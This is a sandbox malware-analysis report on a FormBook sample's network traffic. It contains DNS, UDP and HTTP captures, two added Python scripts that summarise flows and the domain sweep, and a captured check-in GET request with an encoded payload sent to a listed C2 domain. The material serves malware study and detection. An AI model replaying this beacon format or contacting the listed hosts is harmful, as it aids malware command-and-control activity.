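The TCP packet table and the Snort alerts show the same minute of activity from two angles: the sample opened port-80 connections to seven hosts between 12:46:38 and 12:47:39, yet only the 198.185.159.144 session matched the ET FormBook check-in signatures, and the 34.102.136.180 session matched only the generic SID 1201 "403 Forbidden" response rule. The script below is an added example for this page, not part of the sandbox report or its tooling. It folds per-packet rows in the table's format into per-flow summaries (initiator, packets in each direction, duration) and tags each flow with the Snort SIDs whose endpoints match, which is the join an analyst otherwise does by eye when deciding whether the hosts the IDS stayed silent on deserve the same blocking as the one it named. SAMPLE_ROWS is an abridged copy of the table above (three of the seven sessions); ALERTS is the Snort table reduced to SID and endpoints. The timezone token is dropped during parsing, so the timestamps are treated as naive local time.

```python
"""Per-flow summary over packet rows, joined with Snort alerts.

Added example for this report page, not part of the sandbox report itself.
SAMPLE_ROWS: abridged copy of the report's TCP packet table, one packet per
line (timestamp, source port, dest port, source IP, dest IP).
ALERTS: the report's Snort rows as (sid, sport, dport, src, dst).
"""
from datetime import datetime

SAMPLE_ROWS = [
    "Apr 8, 2021 12:46:38.828039885 CEST  49723  80  192.168.2.6  104.160.174.177",
    "Apr 8, 2021 12:46:41.838196039 CEST  49723  80  192.168.2.6  104.160.174.177",
    "Apr 8, 2021 12:46:42.010420084 CEST  80  49723  104.160.174.177  192.168.2.6",
    "Apr 8, 2021 12:46:42.011430979 CEST  49723  80  192.168.2.6  104.160.174.177",
    "Apr 8, 2021 12:46:58.729919910 CEST  49741  80  192.168.2.6  198.185.159.144",
    "Apr 8, 2021 12:46:58.836591959 CEST  80  49741  198.185.159.144  192.168.2.6",
    "Apr 8, 2021 12:46:58.836755037 CEST  49741  80  192.168.2.6  198.185.159.144",
    "Apr 8, 2021 12:46:58.836958885 CEST  49741  80  192.168.2.6  198.185.159.144",
    "Apr 8, 2021 12:47:09.080147982 CEST  49742  80  192.168.2.6  34.102.136.180",
    "Apr 8, 2021 12:47:09.092434883 CEST  80  49742  34.102.136.180  192.168.2.6",
]

ALERTS = [
    (2031453, 49741, 80, "192.168.2.6", "198.185.159.144"),
    (2031449, 49741, 80, "192.168.2.6", "198.185.159.144"),
    (2031412, 49741, 80, "192.168.2.6", "198.185.159.144"),
    (1201, 80, 49742, "34.102.136.180", "192.168.2.6"),
]


def parse_ts(text: str) -> datetime:
    """'Apr 8, 2021 12:46:38.828039885' -> datetime (strptime allows at most 6 fraction digits)."""
    head, _, frac = text.partition(".")
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def summarize_flows(rows, alerts=()):
    """Group packets by endpoint pair; the side that sent the first packet is the client.

    Returns one dict per flow, in order of first appearance, with packet
    counts per direction, duration in seconds and the matching alert SIDs.
    """
    flows = {}
    for row in rows:
        *ts_parts, sport, dport, src, dst = row.split()
        ts = parse_ts(" ".join(ts_parts[:4]))  # drop the timezone token
        a, b = (src, int(sport)), (dst, int(dport))
        flow = flows.setdefault(frozenset((a, b)), {
            "client": a, "server": b, "out": 0, "in": 0,
            "first": ts, "last": ts, "alerts": []})
        flow["out" if a == flow["client"] else "in"] += 1
        flow["last"] = max(flow["last"], ts)
    for sid, sport, dport, src, dst in alerts:  # direction-agnostic endpoint match
        key = frozenset(((src, sport), (dst, dport)))
        if key in flows:
            flows[key]["alerts"].append(sid)
    for flow in flows.values():
        flow["duration_s"] = (flow["last"] - flow["first"]).total_seconds()
    return list(flows.values())


def format_flow(flow) -> str:
    """One report line per flow, marking flows no signature fired on."""
    tag = ",".join(map(str, flow["alerts"])) or "no alert"
    return (f"{flow['client'][0]}:{flow['client'][1]} -> {flow['server'][0]}:{flow['server'][1]}  "
            f"out={flow['out']} in={flow['in']} {flow['duration_s']:.3f}s  [{tag}]")


if __name__ == "__main__":
    for f in summarize_flows(SAMPLE_ROWS, ALERTS):
        print(format_flow(f))
```

Flows tagged "no alert" are the ones to pivot on: FormBook walks a list of mostly decoy domains and only the live C2 produces the check-in the ET rules describe, so the silent hosts are still candidates for the same configuration and should be checked against the C2 list the report extracted rather than cleared because the IDS said nothing.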

UDP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
Apr 8, 2021 12:45:40.491200924 CEST  58377  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:45:40.503812075 CEST  53  58377  8.8.8.8  192.168.2.6
Apr 8, 2021 12:45:40.519510031 CEST  55074  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:45:40.531883955 CEST  53  55074  8.8.8.8  192.168.2.6
Apr 8, 2021 12:45:40.561065912 CEST  54513  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:45:40.574002981 CEST  53  54513  8.8.8.8  192.168.2.6
Apr 8, 2021 12:45:41.460359097 CEST  62044  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:45:41.473582029 CEST  53  62044  8.8.8.8  192.168.2.6
Apr 8, 2021 12:45:42.396193981 CEST  63791  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:45:42.415102959 CEST  53  63791  8.8.8.8  192.168.2.6
Apr 8, 2021 12:45:46.134046078 CEST  64267  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:45:46.146598101 CEST  53  64267  8.8.8.8  192.168.2.6
Apr 8, 2021 12:45:46.986300945 CEST  49448  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:45:46.998900890 CEST  53  49448  8.8.8.8  192.168.2.6
Apr 8, 2021 12:45:52.766400099 CEST  60342  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:45:52.779835939 CEST  53  60342  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:02.372802019 CEST  61346  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:02.385209084 CEST  53  61346  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:04.517719984 CEST  51774  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:04.529655933 CEST  53  51774  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:06.922087908 CEST  56023  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:06.934973001 CEST  53  56023  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:08.683914900 CEST  58384  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:08.697056055 CEST  53  58384  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:11.894196033 CEST  60261  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:11.907191992 CEST  53  60261  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:12.857455969 CEST  56061  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:12.869524956 CEST  53  56061  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:13.544354916 CEST  58336  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:13.557018995 CEST  53  58336  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:14.242495060 CEST  53781  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:14.256418943 CEST  53  53781  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:15.592278957 CEST  54064  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:15.604839087 CEST  53  54064  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:16.340641975 CEST  52811  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:16.354026079 CEST  53  52811  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:17.016047001 CEST  55299  53  192.168.2.6  8.8.8.8
Apr 8, 2021 12:46:17.029288054 CEST  53  55299  8.8.8.8  192.168.2.6
Apr 8, 2021 12:46:17.737343073 CEST  63745  53  192.168.2.6  8.8.8.8
                                                                    Apr 8, 2021 12:46:17.750946999 CEST53637458.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:18.768487930 CEST5005553192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:18.781229973 CEST53500558.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:19.469026089 CEST6137453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:19.481959105 CEST53613748.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:29.406141043 CEST5033953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:29.423815012 CEST53503398.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:36.685190916 CEST6330753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:36.704133034 CEST53633078.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:38.335319042 CEST4969453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:38.818474054 CEST53496948.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:46.989202976 CEST5498253192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:47.105591059 CEST53549828.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:47.799890041 CEST5001053192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.030651093 CEST6371853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.069102049 CEST53500108.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:48.173165083 CEST53637188.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:48.494082928 CEST6211653192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.506784916 CEST53621168.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:48.805192947 CEST6381653192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:48.818182945 CEST53638168.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:49.010258913 CEST5501453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:49.045222998 CEST53550148.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:49.234910011 CEST6220853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:49.324081898 CEST53622088.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:49.741507053 CEST5757453192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:49.755121946 CEST53575748.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:50.091692924 CEST5181853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:50.104129076 CEST53518188.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:50.764836073 CEST5662853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:50.832796097 CEST53566288.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:51.420423031 CEST6077853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:51.433657885 CEST53607788.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:51.829622984 CEST5379953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:51.842360020 CEST53537998.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:53.534490108 CEST5468353192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:53.672425032 CEST53546838.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:56.255649090 CEST5932953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:56.274786949 CEST53593298.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:46:58.687747002 CEST6402153192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:46:58.728197098 CEST53640218.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:03.972100973 CEST5612953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:03.995660067 CEST53561298.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:09.055725098 CEST5817753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:09.078679085 CEST53581778.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:14.224930048 CEST5070053192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:14.548867941 CEST53507008.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:21.684954882 CEST5406953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:21.743495941 CEST53540698.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:23.284853935 CEST6117853192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:23.360908031 CEST53611788.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:27.867861986 CEST5701753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:27.880448103 CEST53570178.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:28.412189960 CEST5632753192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:28.458304882 CEST53563278.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:30.204473972 CEST5024353192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:30.231271982 CEST53502438.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:33.472132921 CEST6205553192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:33.581131935 CEST53620558.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:38.813100100 CEST6124953192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:38.883302927 CEST53612498.8.8.8192.168.2.6
                                                                    Apr 8, 2021 12:47:44.016849041 CEST6525253192.168.2.68.8.8.8
                                                                    Apr 8, 2021 12:47:44.147923946 CEST53652528.8.8.8192.168.2.6

                                                                    DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 8, 2021 12:46:38.335319042 CEST | 192.168.2.6 | 8.8.8.8 | 0xd2c6 | Standard query (0) | www.ly-iot.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:48.030651093 CEST | 192.168.2.6 | 8.8.8.8 | 0x5e24 | Standard query (0) | www.ronwongart.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:53.534490108 CEST | 192.168.2.6 | 8.8.8.8 | 0xb23 | Standard query (0) | www.vbkulkarni.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:58.687747002 CEST | 192.168.2.6 | 8.8.8.8 | 0x75b4 | Standard query (0) | www.pimpmyrecipe.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:03.972100973 CEST | 192.168.2.6 | 8.8.8.8 | 0xda46 | Standard query (0) | www.csgo-roll.net | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:09.055725098 CEST | 192.168.2.6 | 8.8.8.8 | 0x43ea | Standard query (0) | www.foodsystemsjusticeproject.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:14.224930048 CEST | 192.168.2.6 | 8.8.8.8 | 0x2ff5 | Standard query (0) | www.batiktintaemas.com | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:23.284853935 CEST | 192.168.2.6 | 8.8.8.8 | 0x5600 | Standard query (0) | www.breathharbour.net | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:28.412189960 CEST | 192.168.2.6 | 8.8.8.8 | 0x1d35 | Standard query (0) | www.libreo.club | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:33.472132921 CEST | 192.168.2.6 | 8.8.8.8 | 0x3f25 | Standard query (0) | www.addthat.xyz | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:38.813100100 CEST | 192.168.2.6 | 8.8.8.8 | 0x439 | Standard query (0) | www.evecrude.xyz | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:44.016849041 CEST | 192.168.2.6 | 8.8.8.8 | 0xb854 | Standard query (0) | www.generalflix.com | A (IP address) | IN (0x0001)

                                                                    DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 8, 2021 12:46:38.818474054 CEST | 8.8.8.8 | 192.168.2.6 | 0xd2c6 | No error (0) | www.ly-iot.com | l.17986.net |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:46:38.818474054 CEST | 8.8.8.8 | 192.168.2.6 | 0xd2c6 | No error (0) | l.17986.net |  | 104.160.174.177 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:48.173165083 CEST | 8.8.8.8 | 192.168.2.6 | 0x5e24 | No error (0) | www.ronwongart.com |  | 104.161.84.100 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:53.672425032 CEST | 8.8.8.8 | 192.168.2.6 | 0xb23 | Name error (3) | www.vbkulkarni.com | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:58.728197098 CEST | 8.8.8.8 | 192.168.2.6 | 0x75b4 | No error (0) | www.pimpmyrecipe.com | ext-cust.squarespace.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:46:58.728197098 CEST | 8.8.8.8 | 192.168.2.6 | 0x75b4 | No error (0) | ext-cust.squarespace.com |  | 198.185.159.144 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:58.728197098 CEST | 8.8.8.8 | 192.168.2.6 | 0x75b4 | No error (0) | ext-cust.squarespace.com |  | 198.49.23.144 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:58.728197098 CEST | 8.8.8.8 | 192.168.2.6 | 0x75b4 | No error (0) | ext-cust.squarespace.com |  | 198.49.23.145 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:46:58.728197098 CEST | 8.8.8.8 | 192.168.2.6 | 0x75b4 | No error (0) | ext-cust.squarespace.com |  | 198.185.159.145 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:09.078679085 CEST | 8.8.8.8 | 192.168.2.6 | 0x43ea | No error (0) | www.foodsystemsjusticeproject.com | foodsystemsjusticeproject.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:47:09.078679085 CEST | 8.8.8.8 | 192.168.2.6 | 0x43ea | No error (0) | foodsystemsjusticeproject.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:14.548867941 CEST | 8.8.8.8 | 192.168.2.6 | 0x2ff5 | No error (0) | www.batiktintaemas.com | batiktintaemas.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:47:14.548867941 CEST | 8.8.8.8 | 192.168.2.6 | 0x2ff5 | No error (0) | batiktintaemas.com |  | 193.168.194.206 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:23.360908031 CEST | 8.8.8.8 | 192.168.2.6 | 0x5600 | Server failure (2) | www.breathharbour.net | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:28.458304882 CEST | 8.8.8.8 | 192.168.2.6 | 0x1d35 | Name error (3) | www.libreo.club | none | none | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:33.581131935 CEST | 8.8.8.8 | 192.168.2.6 | 0x3f25 | No error (0) | www.addthat.xyz |  | 199.59.242.153 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:38.883302927 CEST | 8.8.8.8 | 192.168.2.6 | 0x439 | No error (0) | www.evecrude.xyz | redirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:47:38.883302927 CEST | 8.8.8.8 | 192.168.2.6 | 0x439 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:47:38.883302927 CEST | 8.8.8.8 | 192.168.2.6 | 0x439 | No error (0) | natroredirect.natrocdn.com |  | 85.159.66.93 | A (IP address) | IN (0x0001)
Apr 8, 2021 12:47:44.147923946 CEST | 8.8.8.8 | 192.168.2.6 | 0xb854 | No error (0) | www.generalflix.com | generalflix.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 8, 2021 12:47:44.147923946 CEST | 8.8.8.8 | 192.168.2.6 | 0xb854 | No error (0) | generalflix.com |  | 94.46.9.37 | A (IP address) | IN (0x0001)
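
The two tables above show the sample working through a list of twelve domains at a near-constant interval of about five seconds: two names return NXDOMAIN, one SERVFAIL, the www.csgo-roll.net query has no row in the answers table, and several of the rest only resolve through one or more CNAME hops. The Python below is an added example and not part of the Joe Sandbox report: it transcribes the queries and answers into records, follows each CNAME chain to its final A records, and summarises cadence and outcomes, which is the view an analyst needs before matching resolved addresses against the HTTP sessions that follow. Timestamps are cut to microseconds so datetime can parse them; the status labels (NOANSWER for a transaction with no reply row) are the example's own naming.

```python
"""Added example (not from the report): summarise the DNS sweep in the tables above."""
from collections import Counter
from datetime import datetime
from statistics import median

# Transcribed from the DNS Queries table: (timestamp, transaction ID, queried name).
QUERIES = [
    ("2021-04-08 12:46:38.335319", 0xd2c6, "www.ly-iot.com"),
    ("2021-04-08 12:46:48.030651", 0x5e24, "www.ronwongart.com"),
    ("2021-04-08 12:46:53.534490", 0x0b23, "www.vbkulkarni.com"),
    ("2021-04-08 12:46:58.687747", 0x75b4, "www.pimpmyrecipe.com"),
    ("2021-04-08 12:47:03.972100", 0xda46, "www.csgo-roll.net"),
    ("2021-04-08 12:47:09.055725", 0x43ea, "www.foodsystemsjusticeproject.com"),
    ("2021-04-08 12:47:14.224930", 0x2ff5, "www.batiktintaemas.com"),
    ("2021-04-08 12:47:23.284853", 0x5600, "www.breathharbour.net"),
    ("2021-04-08 12:47:28.412189", 0x1d35, "www.libreo.club"),
    ("2021-04-08 12:47:33.472132", 0x3f25, "www.addthat.xyz"),
    ("2021-04-08 12:47:38.813100", 0x0439, "www.evecrude.xyz"),
    ("2021-04-08 12:47:44.016849", 0xb854, "www.generalflix.com"),
]

# Transcribed from the DNS Answers table: (transaction ID, reply code, owner name, type, rdata).
# rdata is None where the reply carried no record (NXDOMAIN / SERVFAIL).
ANSWERS = [
    (0xd2c6, 0, "www.ly-iot.com", "CNAME", "l.17986.net"),
    (0xd2c6, 0, "l.17986.net", "A", "104.160.174.177"),
    (0x5e24, 0, "www.ronwongart.com", "A", "104.161.84.100"),
    (0x0b23, 3, "www.vbkulkarni.com", "A", None),
    (0x75b4, 0, "www.pimpmyrecipe.com", "CNAME", "ext-cust.squarespace.com"),
    (0x75b4, 0, "ext-cust.squarespace.com", "A", "198.185.159.144"),
    (0x75b4, 0, "ext-cust.squarespace.com", "A", "198.49.23.144"),
    (0x75b4, 0, "ext-cust.squarespace.com", "A", "198.49.23.145"),
    (0x75b4, 0, "ext-cust.squarespace.com", "A", "198.185.159.145"),
    (0x43ea, 0, "www.foodsystemsjusticeproject.com", "CNAME", "foodsystemsjusticeproject.com"),
    (0x43ea, 0, "foodsystemsjusticeproject.com", "A", "34.102.136.180"),
    (0x2ff5, 0, "www.batiktintaemas.com", "CNAME", "batiktintaemas.com"),
    (0x2ff5, 0, "batiktintaemas.com", "A", "193.168.194.206"),
    (0x5600, 2, "www.breathharbour.net", "A", None),
    (0x1d35, 3, "www.libreo.club", "A", None),
    (0x3f25, 0, "www.addthat.xyz", "A", "199.59.242.153"),
    (0x0439, 0, "www.evecrude.xyz", "CNAME", "redirect.natrocdn.com"),
    (0x0439, 0, "redirect.natrocdn.com", "CNAME", "natroredirect.natrocdn.com"),
    (0x0439, 0, "natroredirect.natrocdn.com", "A", "85.159.66.93"),
    (0xb854, 0, "www.generalflix.com", "CNAME", "generalflix.com"),
    (0xb854, 0, "generalflix.com", "A", "94.46.9.37"),
]

RCODES = {0: "NOERROR", 2: "SERVFAIL", 3: "NXDOMAIN"}


def resolve(name, txid, answers=ANSWERS, max_hops=8):
    """Follow the CNAME chain of one transaction; return (status, final A addresses).

    status is the reply code name, or NOANSWER when the capture holds no reply
    row for the transaction (the www.csgo-roll.net query above).
    """
    rrs = [a for a in answers if a[0] == txid]
    if not rrs:
        return "NOANSWER", []
    rcode = rrs[0][1]
    if rcode != 0:
        return RCODES.get(rcode, f"RCODE{rcode}"), []
    target, ips = name, []
    for _ in range(max_hops):  # bounded so a CNAME loop cannot spin forever
        ips = [rd for _, _, owner, rtype, rd in rrs if owner == target and rtype == "A"]
        if ips:
            break
        cnames = [rd for _, _, owner, rtype, rd in rrs if owner == target and rtype == "CNAME"]
        if not cnames:
            break
        target = cnames[0]
    return "NOERROR", ips


def sweep_stats(queries=QUERIES):
    """Cadence and outcome summary of the domain-list walk."""
    ts = [datetime.strptime(t, "%Y-%m-%d %H:%M:%S.%f") for t, _, _ in queries]
    gaps = [(later - earlier).total_seconds() for earlier, later in zip(ts, ts[1:])]
    outcomes = Counter(resolve(name, txid)[0] for _, txid, name in queries)
    return {
        "distinct_domains": len({name for _, _, name in queries}),
        "span_seconds": round((ts[-1] - ts[0]).total_seconds(), 1),
        "median_gap_seconds": round(median(gaps), 1),
        "outcomes": dict(outcomes),
    }


def resolved_hosts(queries=QUERIES):
    """Queried name -> final A addresses for every name that resolved; these are
    the endpoints to cross-check against the HTTP sessions that follow."""
    out = {}
    for _, txid, name in queries:
        _, ips = resolve(name, txid)
        if ips:
            out[name] = ips
    return out


if __name__ == "__main__":
    print(sweep_stats())
    for host, addrs in resolved_hosts().items():
        print(f"{host:36} -> {', '.join(addrs)}")
```

The median gap of roughly 5.2 s and the two longer gaps (before www.ronwongart.com and before www.breathharbour.net) come straight from the query timestamps; a detection that keys on "many distinct second-level domains from one host at a fixed cadence, with a mix of NXDOMAIN and parked-page answers" would fire on this capture without knowing any of the names in advance.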

                                                                    HTTP Request Dependency Graph

                                                                    • www.ly-iot.com
                                                                    • www.ronwongart.com
                                                                    • www.pimpmyrecipe.com
                                                                    • www.foodsystemsjusticeproject.com
                                                                    • www.batiktintaemas.com
                                                                    • www.addthat.xyz
                                                                    • www.evecrude.xyz

                                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49723 | 104.160.174.177 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Apr 8, 2021 12:46:42.498070002 CEST | 1250 | OUT | GET /goei/?EzuXh6BP=B46qr3zTyBR1t+VKbrees7UR/FiD4WL3nz1lGh06nIBkEBDQrNA0bRgDDyF1Au9+nA9wWbL6eg==&RL0=rVvxj02xpd_lyz HTTP/1.1
                                                                    Host: www.ly-iot.com
                                                                    Connection: close
                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                    Data Ascii:
Apr 8, 2021 12:46:43.287656069 CEST | 1252 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.17.10
                                                                    Date: Thu, 08 Apr 2021 10:46:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    X-Powered-By: PHP/7.3.15
                                                                    Data Raw: 31 39 65 33 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 6c 79 2d 69 6f 74 2e 63 6f 6d 20 2d 20 54 68 65 20 64 6f 6d 61 69 6e 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 66 6f 72 20 70 75 72 63 68 61 73 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 6c 69 62 73 2e 62 61 69 64 75 2e 63 6f 6d 2f 6a 71 75 65 72 79 2f 31 2e 39 2e 30 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 77 69 6e 64 6f 77 2e 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3c 37 30 30 29 7b 24 28 22 2a 22 29 2e 63 73 73 28 7b 22 77 69 64 74 68 22 3a 22 61 75 74 6f 22 2c 22 68 65 69 67 68 74 22 3a 22 61 75 74 6f 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 22 3a 22 6e 6f 6e 65 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 73 74 61 74 69 63 22 7d 29 3b 24 28 22 70 22 29 2e 63 73 73 28 22 63 6f 6c 6f 72 22 2c 22 62 6c 61 63 6b 22 29 3b 24 28 22 2e 73 74 65 6e 63 69 6c 2d 74 69 70 22 29 2e 63 73 73 28 22 6c 69 6e 65 2d 68 65 69 67 68 74 22 2c 22 33 30 70 78 22 29 3b 7d 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 42 4f 44 59 20 7b 0d 0a 09 46 4f 4e 54 2d 53 49 5a 45 3a 20 31 32 70 78 3b 20 4d 41 52 47 49 4e 3a 20 31 38 70 78 20 30 70 78 20 30 70 78 3b 20 43 4f 4c 4f 52 3a 20 23 34 32 34 32 34 32 3b 20 42 41 43 4b 47 52 4f 55 
